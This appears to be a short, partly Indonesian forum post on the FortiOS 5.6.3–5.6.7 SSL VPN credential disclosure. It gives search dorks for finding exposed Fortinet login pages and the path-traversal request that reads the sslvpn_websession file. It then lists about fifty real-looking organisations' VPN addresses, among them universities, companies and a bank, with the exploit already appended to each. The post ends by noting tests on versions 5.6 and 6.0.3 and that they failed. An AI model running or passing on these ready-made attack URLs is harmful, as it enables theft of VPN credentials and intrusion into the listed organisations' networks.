FortiOS 5.6.3 - 5.6.7 - Credentials Disclosure

sumber
https://www.exploit-db.com/exploits/47288

dork : inurl:“remote/login?lang=en”
dork 2 : FortiToken clock drift detected. Please input the next code and continue
dork 3 : Please Login. Name: Password: FortiToken Code: FortiToken clock drift detected.

exploit : remote/fgt_lang?lang=/…/…/…/…//////////dev/cmdb/sslvpn_websession

https://vpn1.rashi.org.il/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://mx.we-ankor.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://vpn.nimoveri.co.uk/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://vpn01.lvlomas.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://remoteaccess.emanuel.org.uk:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://pgh-vpn.perkinseastman.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://vpn.bapco.net/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://smtp.vib.be/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://mail.isvag.be:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://vpn.pucobre.cl:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://office.verein-fuer-sozialarbeit.de/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://portal.buzziunicemusa.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://red.elea.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://vpn1.rashi.org.il/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://weinhausschuh.dyndns.org/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://physionet.ecuore.org:44444/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://portal.hwmllc.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://vpn.m-holland.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://vpn.educacionbogota.edu.co/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://vpn.csp.edu/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://online.nlicgulf.com:12443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://portal1.pidiliteit.in:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://vkvpn.vakifkatilim.com.tr/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://vpn2.mazarsdenge.com.tr/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://sslvpn.gilbaneco.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://vpn.cimlbr.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://www.pcoc.us/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://www.basilar.com.br/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

https://vpn2.sofidel.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://vpn.bontaz-centre.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://vpn.hkuspace.hku.hk/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://remote.cefi.ca/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://sslvpn.wahlee.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://mailugt.ugt.org:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

https://vpn.openboxsoftware.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://remote.whortonins.com:3443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

https://mail.sogena.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://portal.fraport-greece.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://vpn.tut.ac.za/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://rndesign.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://anlagen-brs.b-s-b.ch:11443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://portal.quartzelec.com:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://80.86.150.142:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://vpn.djoglobal.com:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

https://myvpn.upf.edu/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://gate.itworx.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://www.richester.com.br/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

https://vpn.stellartec.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://vpn2.bornontario.ca/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://confluence.syft.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://connectcas.bcx.co.za/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

https://vpnportal.walterhav.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

testing di 5.6 sama 6.03

image

image

image

gagal gan